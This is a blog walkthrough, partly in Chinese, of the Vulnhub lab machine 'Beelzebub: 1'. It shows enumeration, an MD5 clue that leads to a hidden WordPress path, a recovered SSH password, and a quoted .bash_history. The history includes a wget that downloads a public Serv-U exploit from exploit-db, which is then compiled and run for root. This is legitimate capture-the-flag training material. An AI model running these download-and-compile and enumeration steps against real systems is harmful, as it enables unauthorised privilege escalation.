laitimes
return

Vulnhub刷题记录 (BEELZEBUB: 1)

author:AILX10
Vulnhub刷题记录 (BEELZEBUB: 1)
  • 英文名称:BEELZEBUB: 1
  • Chinese name: Beelzebub: 1
  • Published date: September 8, 2021
  • Difficulty: Easy
  • Description: You have to enumerate as much as you can, and don't forget Base64.
  • Download: https://www.vulnhub.com/entry/empire-breakout,751/
Vulnhub刷题记录 (BEELZEBUB: 1)

AILX10

Excellent answerer in cybersecurity

Master's in Cybersecurity

Go to consult

1. Boot information, know the username (krampus)

Vulnhub刷题记录 (BEELZEBUB: 1)

Boot information

2. Host discovery (192.168.199.146)

Vulnhub刷题记录 (BEELZEBUB: 1)

Host discovery

3. Port scanning (22, 80 ports)

Vulnhub刷题记录 (BEELZEBUB: 1)

Port scanning

4. Check the web page

Vulnhub刷题记录 (BEELZEBUB: 1)

web pages

5. Scan the catalog 

dirb http://192.168.199.146/
或
dirsearch -u http://192.168.199.146/
Vulnhub刷题记录 (BEELZEBUB: 1)

Scan the catalog

6. Visit the home page of index

Vulnhub刷题记录 (BEELZEBUB: 1)

index homepage

Check the source code on the front page of index to get clues

<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
Vulnhub刷题记录 (BEELZEBUB: 1)

source code on the index home page

7. MD5 calculation processing for beelzebub 

└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1
d18e1e22becbd915b45e0e655429d487
Vulnhub刷题记录 (BEELZEBUB: 1)

MD5 calculations

8. Tried to access the link, but was redirected by 301

Vulnhub刷题记录 (BEELZEBUB: 1)

Suspected WordPress site

9. Try to traverse the directory, and you can be sure that it is a WordPress site 

dirsearch -u  http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/
Vulnhub刷题记录 (BEELZEBUB: 1)

Traverse the directory

10. Try to access uploads

Vulnhub刷题记录 (BEELZEBUB: 1)

uploads

点击 talk to valak

签订契约的人有时会试图智取魔鬼,但最终还是失败了。
Vulnhub刷题记录 (BEELZEBUB: 1)

talk to valak

11、尝试burp分析,拿到密码 M4k3Ad3a1

Vulnhub刷题记录 (BEELZEBUB: 1)

BURP analysis

12. Try SSH login

Vulnhub刷题记录 (BEELZEBUB: 1)

SSH login

13. Successfully obtain the flag of ordinary users

Vulnhub刷题记录 (BEELZEBUB: 1)

Normal flag

14. Digging clues (.bash_history) 

krampus@beelzebub:~$ ls -la
total 104
drwsrwxrwx 17 krampus krampus  4096 Mar 20  2021 .
drwxr-xr-x  3 root    root     4096 Mar 16  2021 ..
-rw-------  1 krampus krampus  1407 Mar 20  2021 .bash_history
drwx------ 11 krampus krampus  4096 Mar 20  2021 .cache
drwxrwxrwx 14 krampus krampus  4096 May 26  2020 .config
drwxrwxrwx  3 krampus krampus  4096 Oct 20  2019 .dbus
drwxrwxrwx  2 krampus krampus  4096 Mar 19  2021 Desktop
drwxrwxrwx  2 krampus krampus  4096 Apr  8  2020 Documents
drwxrwxrwx  2 krampus krampus  4096 Mar 19  2021 Downloads
drwxrwxrwx  3 krampus krampus  4096 Oct 20  2019 .gnupg
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 .gvfs
-rwxrwxrwx  1 krampus krampus 12844 Mar 20  2021 .ICEauthority
drwxr-xr-x  3 krampus krampus  4096 Mar 19  2021 .local
drwxrwxrwx  5 krampus krampus  4096 Apr  2  2020 .mozilla
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Music
drwxrwxrwx  2 krampus krampus  4096 Oct 21  2019 Pictures
-rwxrwxrwx  1 krampus krampus   807 Oct 20  2019 .profile
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Public
-rwxrwxrwx  1 krampus krampus    66 Oct 20  2019 .selected_editor
-rw-rw-r--  1 krampus krampus    83 May 26  2020 .Serv-U-Tray.conf
-rwxrwxrwx  1 krampus krampus     0 Oct 20  2019 .sudo_as_admin_successful
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Templates
drwxrwxrwx  2 krampus krampus  4096 Oct 20  2019 Videos
-rw-rw-r--  1 krampus krampus   173 Mar 20  2021 .wget-hsts

15. View history 

krampus@beelzebub:~$ cat .bash_history 
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip 
su root
clear
exit
chmod 0750 html/
ifconfig
cd /var/lib/mysql/
clear
ls
cd wordpress/
sudo su
su root
clear
ls
cd Desktop/
clear
ls
cat user.txt 
clear
uname -a
sudo -1
sudo -i
clear
uname -a
sudo -i
find / -prem -u=s -type f 2>/dev/null
find / -prem -u=s -type f 2>/dev/null
cat /etc/issue
sudo -l
cd
cd ../
cd ../../../../
clear
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ls
cd
clear
ps -aux
ps -a
ps -a -U root
ps -a -U root | grep 'Serv'
ps -U root -au
ps -U root -au | sort -u
clear
cd /tmp/
clear
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
clear
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit 
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
clear
ls
cd Trash/
ls
cat info
cd info
ls
ls -la
cd ../
clear
cd ../
ls
rm -rf Trash/
clear
su root
history -R
history -r
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip 
su root
clear
exit
history
clear
cd
clear
ip link
su root
clear
ls
history
clear
ls
cd /tmp/
ls
su root
exit
clear

16. According to the prompts in .bash_history, complete the privilege escalation and obtain the flag of root

Vulnhub刷题记录 (BEELZEBUB: 1)

Repetition

At this point, the experiment is complete~

Posted on 2022-08-22 21:46

Previous: vulnhub刷题记录(Deathnote: 1)
Next: vulnhub刷题记录(doubletrouble: 1)